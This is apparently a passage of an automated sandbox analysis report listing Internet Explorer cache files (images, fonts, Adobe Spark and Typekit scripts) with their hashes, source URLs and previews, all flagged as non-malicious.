                                                                                                                                                                                                                                                        File Type:PNG image data, 140 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2151
                                                                                                                                                                                                                                                        Entropy (8bit):7.859633225944545
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:FPEsgO6wykn4cbmeXfVzSzJwbU9dZKASJ/soJ0ANfknj28W:FPEsF6wfjvdOgUDZKzXyc6j28W
                                                                                                                                                                                                                                                        MD5:9AE66EC6AE11F8E9D108E160D2CC138C
                                                                                                                                                                                                                                                        SHA1:2A2D777BB0F63FF0AC298BE41FE2F046D91572CB
                                                                                                                                                                                                                                                        SHA-256:6428A477DD15F959CB1B563A0009EDAA1EF0716852763792D0C66BCF1F4AF4AE
                                                                                                                                                                                                                                                        SHA-512:ACB85C2A7530F2581D1BC52AF334A5A46452B8EAD3F1BD46C06BB5B9FF686C19B6D24BF25D1074777505D95611321A40D0E48D81FB3BA89926AB158A4BBE63C8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://s3.amazonaws.com/adobe-luca-prod-ue1-assets/experiments/base/images/adobe-logo-gray.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR....... .............IDATx...oTE..?[X..,wP....`.*j./.11..51^6..O>...............e..."HA... ..h...X.~3..s.=.J.7.t....=...;..k.l|....^.N{.}.X.b.../S..G....D..R...?..lN9.8..HC.:.U....)......S....=a./.%)..1..].O.......U.......D..q1....).^l....~.5....r....")a...S.SG...).f.{u.....d.Q%L.....v'Pk.}V...N..ql..iL.....f....X...h....U....<6...r.9X..l..79....h.K...O`..6.X9fO.<.Gs0_.de......I....n..2.....o.D...f.[.Mt.]....2....3...`.j{...N.,.hS.;U_5..$..{..Wm......R}....>L.R...Q........v....3....k.._..d.g.Y.z$@...E].L......e.:`!.b.).m......X....k..p..gT.......J5.,.....K....sI......w{......F.f%...>....S.".,u.....x<.L.9.p.,5.^[.....Y.zEa.B...uo2p/..."v.xD.... ..:.....ga|'..X.|.....I8..fq.F..c]....W!.....>&.Ob....[....].....3...y..1.V..ZEd...O...b!..}.b95."..vd.t#jp..:u..8.F.X.C.,W......C.J.p...#.S......I.\..A..4v9.p..,../#.c....Xz1f....u......xj!...p. Y.N!..[.;.I..v...0P...P*...w..<.6.0..e..Z....2...D.*.....i2y...[.i\..ir....O..u........zq
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\arrow-down[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):637
                                                                                                                                                                                                                                                        Entropy (8bit):5.905700149935229
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:tmp/KYtvUUCbdhiLjCmiNRaPyTcGKHJXxIZVGtVz2i:tmpLtvUUmdhiLjRiTaKTcrXxtVzV
                                                                                                                                                                                                                                                        MD5:22120158C53146B96EEEE7777298C110
                                                                                                                                                                                                                                                        SHA1:783C883616B35F64634EC253AAC05F2108B97174
                                                                                                                                                                                                                                                        SHA-256:73EA11E38E252B1D267A812BDE6B4F1EB335CA0770DCB60F9BD6A2E640A3DF3F
                                                                                                                                                                                                                                                        SHA-512:01453A6483925DB61E0013FD8D89F718FE16E267DC87A59775DC81600469089F1C220C82496BF6F05EB8E8BA9C310496B17D680C91E62A942EE9E415491FF1FB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/landing/arrow-down.svg
                                                                                                                                                                                                                                                        Preview: <svg data-name="Spark landing.Image" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="9.5" height="5.04" viewBox="0 0 9.5 5.04"><title>arrow-down</title><image data-name="Play_32@1x copy" width="19" height="10" transform="scale(.5)" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAAAo0lEQVQoU62RPQ+CQBBEj5hQUCAWdpT+Z3KttFhqaQ01HRb4T9aZZCUG7suE4oXc3sxLjjUiYvYkGvgXY61tgOxA8xVm4JpQCNHSszwZhwPoEooubuxv/iGGObgnCH55sOddCi4L8EwQieaKzVLWA4RKMERkvD86t+waIlyB0SPj/OTqeYUqPYNpJXtx7usEhSqtwayyN8+hfFSo0gvo+Y1lyQcNtaApEqmiXwAAAABJRU5ErkJggg=="/></svg>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\big-yellow-exclamation-point[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 110 x 102, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2410
                                                                                                                                                                                                                                                        Entropy (8bit):7.569854461422992
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:ukNNn2ktJ3PRre/eOxtZlfqY+rj1zXnUgO/GaCq7f:lf2OeeqlfF+ndXRO+Tqb
                                                                                                                                                                                                                                                        MD5:0C48944C6F37B353D14892E8EB9862DE
                                                                                                                                                                                                                                                        SHA1:8FED687740AED3F235F634A67203C61EB7F5FCAE
                                                                                                                                                                                                                                                        SHA-256:8473E148A6C6B2199C07BD7DC0CEB54A5D943D0FEE634D56620763A42346813B
                                                                                                                                                                                                                                                        SHA-512:BD455D36AE29735C9D737D11CDEC81A761A63203CB08B37C161D3ACAE61A542BB238C58137123224B469EE9BF7A4005E125B15DBA966A23AFCBA7BCB5737D628
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/landing/big-yellow-exclamation-point.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...n...f.....*.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:07CAF5790F2F11E6B83680AF73847A41" xmpMM:DocumentID="xmp.did:07CAF57A0F2F11E6B83680AF73847A41"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:07CAF5770F2F11E6B83680AF73847A41" stRef:documentID="xmp.did:07CAF5780F2F11E6B83680AF73847A41"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>F.Ep....IDATx..[l.E..- .....RA.F....(.......x..T.[@...Qh....../..}..._.._4!.Q../.....h..~.....=..3.3../....9=
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\browser-icon-safari[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 124 x 124, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):25115
                                                                                                                                                                                                                                                        Entropy (8bit):7.984846894248758
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:7jYMKpmdNqN0obP7YnB6pZj1MyPpC9/Hhw691Q/+3ryGjtx54ZNNlRiwnY1X:7MxqPoIMMyRcBw692jGjtKnlMwUX
                                                                                                                                                                                                                                                        MD5:23B02AAF3435635E1E6C324D759B56CA
                                                                                                                                                                                                                                                        SHA1:7DA557E711F8ADD60FE6493789ADCB97B6922A2B
                                                                                                                                                                                                                                                        SHA-256:22B7C23F2DED34B2B0AF1B6D908A533130ABAB7EB32711052D0CAAB35D50BEBB
                                                                                                                                                                                                                                                        SHA-512:7FF438AEEBB35FCC2F62C68E3EDD6C9914BF608BDDFC62B4AD20E91AF937A2395F882BF0CF85CFF2730B6BF4B145110E60FFF7F1F7AFE6FCDBE4A0C8885AC80F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/landing/browser-icon-safari.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...|...|............tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:87E1179C0FF011E69AFE8E50F5F6CE89" xmpMM:DocumentID="xmp.did:87E1179D0FF011E69AFE8E50F5F6CE89"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5F7D657F0FF011E69AFE8E50F5F6CE89" stRef:documentID="xmp.did:5F7D65800FF011E69AFE8E50F5F6CE89"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.q+...^.IDATx..}...U...g...onz.i........**.......bC,X...../J.Ai..H.B.!..z{9........3..s.*O.....)w.93..k.o...p].
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\cc11c7a4-3395-428b-9d98-bf562dee9fff[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1435 x 567, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):410284
                                                                                                                                                                                                                                                        Entropy (8bit):7.981768998395451
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:4jDG91UqS+FQVVOGKlXjtoZBoSXifRzLUzvFRHe:4291JSuG+yBhX0tmdw
                                                                                                                                                                                                                                                        MD5:F65E1BA320DE3F3D1F8C8A232F601D37
                                                                                                                                                                                                                                                        SHA1:36B62D27D47DC712FBF12F8F8498DF7B1C8B9425
                                                                                                                                                                                                                                                        SHA-256:5632A0E95C44D65D9BA1F3BF455469DA835C86AE86284BEB9E7E7467138A7423
                                                                                                                                                                                                                                                        SHA-512:CDDF157E4F99BEEE5899FB9DEAD57CE24AF606097228AD8A5DEE3E9DC7628AED3864D2A468BF9A9275383BEBBD863C57D1F5D25886B3BAD95D48D17074CD66EC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/page/GG8mUEsjQvSUh/images/cc11c7a4-3395-428b-9d98-bf562dee9fff.png?asset_id=ecd5146c-766b-46a9-9dcc-646d4f3a4baa&img_etag=%22cbca1d5e1d77d78ef66008afffa25830%22&size=2560
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR.......7......w.r....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164519, 2020/08/25-17:54:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/">. <xmpMM:DerivedFrom rdf:parseType="Resource"/>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.<?xpacket end="r"?>B.~.....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<.. .IDATx............N....wwh)..k.P...Z../..... 8.P..........nONf......y.3..9>3..;..6..3..c.1..c.1..c.1.....D...3..c.1..c.1...,...1..c.1..c.1.4I..fc.1..c.1..c.1..f...c.1..c.1..cL....c.1..c.1..cL....c.1..c.1..cL...l.1..c.1..c.1.I.F..c.1..c.1..cL...1..c.1..c.1...e.1..c.1..c.1..`...c.1..c.1..cL.Xl6..c.1..c.1...4...1..c.1..c.1.4...4..c.1..c.1...4^ ..c.1..c.1..cL...l.1..c.1..c.1.i,6.c.1..c.1..c.i.....c.1..c.1..c.....c.1.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\chrome[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):192215
                                                                                                                                                                                                                                                        Entropy (8bit):5.180324040916147
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:M0k0Ywhc7llWGQsRbiK7mPP67llWGQsRbiK7mPPz20VMqjwhF0MtkzWG82:M0k0Ywhc7lxQWbiK7mPP67lxQWbiK7mh
                                                                                                                                                                                                                                                        MD5:DFDD3AA8B6F029403DC5DBB97F696EC6
                                                                                                                                                                                                                                                        SHA1:05FF3F6C5F0B65C3C091E3B4D3CF69139CB46CAF
                                                                                                                                                                                                                                                        SHA-256:AB889D6962A84FF0A8812667F14F1073E30D63E8023C96671E1A1BB17CDEF50B
                                                                                                                                                                                                                                                        SHA-512:6100BA9798866FEB3D5C1A738E309EC99EB8B76139E581DA6AC3DA4F8E4D3EC4DB0A8835DB3513DF064EF65169F74EB40169432170955BE05DB8D4D64B8459F3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://s3.amazonaws.com/adobe-luca-prod-ue1-assets/experiments/chrome/chrome.js
                                                                                                                                                                                                                                                        Preview: (function(){function r(e,n,t){function o(i,f){if(!n[i]){if(!e[i]){var c="function"==typeof require&&require;if(!f&&c)return c(i,!0);if(u)return u(i,!0);var a=new Error("Cannot find module '"+i+"'");throw a.code="MODULE_NOT_FOUND",a}var p=n[i]={exports:{}};e[i][0].call(p.exports,function(r){var n=e[i][1][r];return o(n||r)},p,p.exports,r,e,n,t)}return n[i].exports}for(var u="function"==typeof require&&require,i=0;i<t.length;i++)o(t[i]);return o}return r})()({1:[function(require,module,exports){.var templates = require( '../../dist/chrome/templates' );.var Mustache = require( 'mustache' );..var topBar = function( trackingId, buttonText, linkToWelcome ) {. $( document.body ).on( 'luca-publication-viewer-ready', function(){.. var initialShowTime = 3000;. var backtrackDistance = 100;. var showClassName = 'show';. var aboveTheFoldClassName = 'above-the-fold';.. var $injectHTML = null;. var animator = $( '.article' ).data( 'animator' );. var
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\crisp-fonts.gz[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):139
                                                                                                                                                                                                                                                        Entropy (8bit):4.811599389940217
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:yLRmcpZBLvG/tLAJ2qW7RmMjuRmcszgcukrQLJkgfw0zRjf:yL/pZtvG1M2JRmMju/0gcu/LugfwmRr
                                                                                                                                                                                                                                                        MD5:361FE227C22294543FE0FD29B8D28C0A
                                                                                                                                                                                                                                                        SHA1:1D32C0DC6F27CA2A6C67E5C79DFC08DD39511B03
                                                                                                                                                                                                                                                        SHA-256:17D7DDB7C7C94BA00A4F60835AC14512B6574E5D6B81E99542D44BDA414AACD0
                                                                                                                                                                                                                                                        SHA-512:85C7DA240B8283EF24F91AFCB472AF9E9E2E91A5B6F4E7370E774A50F1BAA0F6DF47E7173854B6593FB4EC8673BF682B7122C3877902AE414F0FDD0334C937B0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/themes/crisp-fonts.gz.js
                                                                                                                                                                                                                                                        Preview: document.write('<script src="//use.typekit.net/rbi5aua.js"><\/script>'),document.write("<script>try{Typekit.load();}catch(e){}<\/script>");
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[1]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 30832, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):30832
                                                                                                                                                                                                                                                        Entropy (8bit):7.985448564079255
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:ULnH4B904aGBOfBA5ruEox7PvHxsFq36CoGkqzyAL6cRHbHOkhBnKW8x+OBEiB:Uz+93akYVEcP/ig6Nh+me7HLBnK1Pa8
                                                                                                                                                                                                                                                        MD5:A24BAB0217A940502655CB39824C4CA4
                                                                                                                                                                                                                                                        SHA1:031E50C9EF47A17C4077EDB15693225AFC16044E
                                                                                                                                                                                                                                                        SHA-256:1CFA3682C2D68F282C013C471044AE4AF711E990D13B0A4A9E1EF257BABFA238
                                                                                                                                                                                                                                                        SHA-512:4BA826B52A7E3E91C26FAF1C5D5DE5AB5A2E57C0DC393653FBA676433873022918CEB6B3016657D93622BEF2AC41C7CE3929DC710AE44BE42A4F5C92CA1F4EE7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/d?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n4&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..xp................................BASE...0...F...Fe$].CFF ......\...os5.Y=DYNA..`............3GDYN..a|........s-.#GPOS..b`...u..$..~.sOS/2.......Y...`\Wv.cmap..w....V......3head...x...4...6..%uhhea....... ...$...Hhmtx..t....)...H.$.Imaxp..............P.name...............post..w........ ...2..............ideoromn..DFLT..cyrl..grek..latn...................\......x.c`d```5...3%...+.3........p..?.?/K... ....$..:...x.RKn.0..9N...Qt.5.v... .Wv..Y%...%....cH......g...g..:.X4M.."(.{ofH>..k|.....l..W.Z...L.>.;.8.%'w..C..>..|r..>>S.u_2*..a.o....z....|.>:.%....o...}g.p.Ig.(...b...-....7..U....b..b..S..nt.c.._.:.gz...u$.~4._O.#[..sWd.v2}"..u.U.hUws.H..(..*w./...GE..Y.<K...h...1.K.7...dF.....7.z...0.W......8.Dc,Q!.&......W.J,X.......V.s..a....F._M..1.._Q..RZ....cr#..^w.....e...T..?S..[...J.v7.wY1...u...{!m7.3)Y.....y.....Z.qC.#g.lN...#;.....}.aW/.s..}...~.N.....7...#.C.;. .......x.c`f|.8.......).....B3.1.1*.E.Y..XX..X......P..............6............1-.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[2]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 30980, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):30980
                                                                                                                                                                                                                                                        Entropy (8bit):7.987621377492639
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:Nh0Jzz1kWYZQL4lNCzPhlKCdN7GgGAvOYHqycQ:Nh6WZQclQzJ5xbvHqnQ
                                                                                                                                                                                                                                                        MD5:01BD649595C405E61BD162E40BFF7260
                                                                                                                                                                                                                                                        SHA1:B03670659950A40A47F9658B71F69FF14F8DA4C2
                                                                                                                                                                                                                                                        SHA-256:2FF95F05AA71F6FE45D80A3FC8585BDE66210ECBC83A1AC494BD679A5CAE28DE
                                                                                                                                                                                                                                                        SHA-512:9C4A5AA9CCD44CDB780515532E79BD26C2F250DAFF67FAC3CDC2B9D7067AB664F1D1301183A928BCD950123652F44781B31EEF5A22B7AC939B261D242E92F4C0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/d?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n7&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..y.................................BASE...0...F...Fe!].CFF ... ..]q..p.q...DYNA..a..........#.3GDYN..bL...........GPOS..c0...@..$..#..OS/2.......Y...`].y.cmap..w....V......3head...x...5...6..%ghhea....... ...$...Chmtx..up...%...H....maxp..............P.name............E@..post..w........ ...2..............ideoromn..DFLT..cyrl..grek..latn...................Y......x.c`d```5.:...]<..W.f..@....^0....~.).......@...).=...x.}..n.0...t..B.\q...s.D..UB.[.v...&..I.w...%.*....@....Ix..8....r.........+|...9......:......w.f...C|r|..xp|...0..?..w..^{..........s...C..7.Gx.{...Y.... ..\gJ...Qe#......N.......oW..3.zGc.?/TZMt..2....d:...8i=4^M...7.n..]..\.2...J...vb .y...t..Y.b..2..0..$^..=.}......}uW...<y.l.E.$.=..".HHc....s....K~......5...Z_.i.............S>.....,..&....c....}j.g.._1...j....V.2..c.k..=....hYQe.9+V-.k}.w7..d...%...f6>.sh....;.=<..a..-5.f2...\.pGu.}W.G....kJ.........x.c`f.........).....B3.1.1..E.9..XX..X......P.............6...........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[3]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 30780, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):30780
                                                                                                                                                                                                                                                        Entropy (8bit):7.988535310328335
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:B4GGbSq0CiAIlwymd1yf04b80qrqH7b7V8zXe1X7QjQlWunvdoO6:B4/SqQ5wymryflbhqrqf7C6NrWunvdo3
                                                                                                                                                                                                                                                        MD5:41291B5CC7AE5A302D0FF767D801DC05
                                                                                                                                                                                                                                                        SHA1:A6B8FA2252C9563DE7FABC7A6F068E5D7C42383E
                                                                                                                                                                                                                                                        SHA-256:641E63A696D3E572B940226372365DDE29D2D581D614B5FCF66323ED46A5CBDD
                                                                                                                                                                                                                                                        SHA-512:3F6F193E7B3F5E0743427577E129D5F21E9A0598F5444A930B53573A87A562861807ACAD2CD4065BBB8FFF7C70821DC500BDBBE431662EC9C04064E975AD5B28
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/37eaae/00000000000000003b9b3f83/27/d?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n3&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..x<................................BASE...0...F...Fe(].CFF ......\...o...C.DYNA..`............3GDYN..ah...........|GPOS..bH..._..$.....OS/2.......W...`[.tJcmap..v....V......3head...x...4...6..%`hhea....... ...$...Lhmtx..t....%...H{e!.maxp..............P.name.............8..post..v........ ...2..............ideoromn..DFLT..cyrl..grek..latn...................`......x.c`d```5..?..N<..W.f..@.....0....6.;.c@.3..H......x.RMn.@.}&$U7.......-+.V. 5R$"...a... {.......r....^.G.*.y<mQ.....|.g......Cs]q6..[....+|p...0u.M...s.....f~u......_s.....{..-t.O..a.}q.M....Qz....h..w..>?._...-.X...2:..].(.]QFF/.....%..LW....oR....fz..Fe(.^8..'C+..K.`u:..g|.e...h..s.K..pS.E..EO*y...h....i..2..@....cv..9..61rQd].#U]....A.....!.Cq.FX.@.M<....q.... [....rKH.K9.fH..LeW.OM..)..o..L....j..O.".Bz|..!...b..E.R.e\.e4.U..........B..i;.X.Pel.r.....$...l..-.j......v.l.......r.~..U[.).....u."V'F.....O.G......x.c`f.........................L,,LL,..L.@yF.(ptqr.R.....gc``...K..q>H...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[4]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 31340, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):31340
                                                                                                                                                                                                                                                        Entropy (8bit):7.9870881023883635
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:8pXzzHNr6GY0k1BBwz8d1Ip1WbAy/iGGOYKzte6fcq:4XJ6LBa8dmib7/NGOYc5n
                                                                                                                                                                                                                                                        MD5:588A4A92645A9E137308924C68778A29
                                                                                                                                                                                                                                                        SHA1:99F03745B7B06DB4201A3B00C6D9BEDEA3F97E9A
                                                                                                                                                                                                                                                        SHA-256:B3220E43420A21615A932915870167A21F7A34E64EBEF3323209E6A9553C1B11
                                                                                                                                                                                                                                                        SHA-512:FCF13CD9528CB0CFE2AF66AEAD2D0029EB6B6514907DF318815C8F08F06E6F4D12299FDBB98B50E5DEA2A01144B43FAB062F880006E2BFF074BA3D2B4DBE7FCB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/180c9d/00000000000000003b9b3f8a/27/d?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n8&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..zl.......4........................BASE...0...F...Fe.].CFF ...0..^...rzyB..DYNA..b............3GDYN..c............^GPOS..d....G..$.....OS/2.......W...`].z.cmap..y....V......3head...x...4...6..%}hhea....... ...$...Ahmtx..v....!...H...emaxp...(..........P.name............a..(post..y........ ...2..............ideoromn..DFLT..cyrl..grek..latn...................W......x.c`d```5.z....o....P..|rh0....e5.} ....$..g...x...j.@....'..L..~6.R.x,!b.+;."..`C..=...1.....u...,....!.*..h4MC14...f.Gw.d......u.Y...\....|u|.cL.7..s|.......g..<1.k..*..9....9n..}w|./...Mj~9>D.8v|.O.o.[..?...TW.fy..dW....2...&/".gR..D.W..).X...r..':......0Ofc..M.".~'.......Y......h.....U....z"|.../s3...H%O.~..un.2Y..e.Sj.s..l..m......i..5.+..+.{q0.Fx.....%.0C...<..%.9.]...........f.6/...c.....v.y..n...934]2.....C......n...C...4B..qA......^'{..+....nl.%O.[......o.vNqgI....xZA]...S....].....5....=....T.5|.ghs.....kz..U5...{%Y.g.|j.3`u]D..J-..x.c`fbeV``e``.b.```...q.F..@QnNf&..&&....v.<#..8.8..)..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[5]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 24744, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):24744
                                                                                                                                                                                                                                                        Entropy (8bit):7.978627515034273
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:EVkksCq/KOwmOt8IEOsyhgjzfwTJsPj6V9teCsx/Abr2k88CDW001VEKHUM7Ozip:qktXUt8he8UheCsx/AhKW0CUUV
                                                                                                                                                                                                                                                        MD5:A14F6E1E3181DC10FDB66D2A7FB54CA7
                                                                                                                                                                                                                                                        SHA1:605808488DD7FEC481400AA948F80E66189D25B5
                                                                                                                                                                                                                                                        SHA-256:A4B8520DF89E973A968FCD3CF78F742E073EA9645D03ACCF360EB4AB5E6E1001
                                                                                                                                                                                                                                                        SHA-512:E741918EF1EC6A3C0B87D996245945AEA9DB8C7D798352756F409A5E519BBF89EBF8F6AFA1E1A71D5C24C4E1C364F7C2EF38622C0897F852C6E9C7E6C27BBE29
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/1da05b/0000000000000000000132df/27/d?primer=7a5a436c948772f5260024dfadc8f7cd849e1448f8bf41ba74a247e8e46f3aee&fvd=n4&v=3
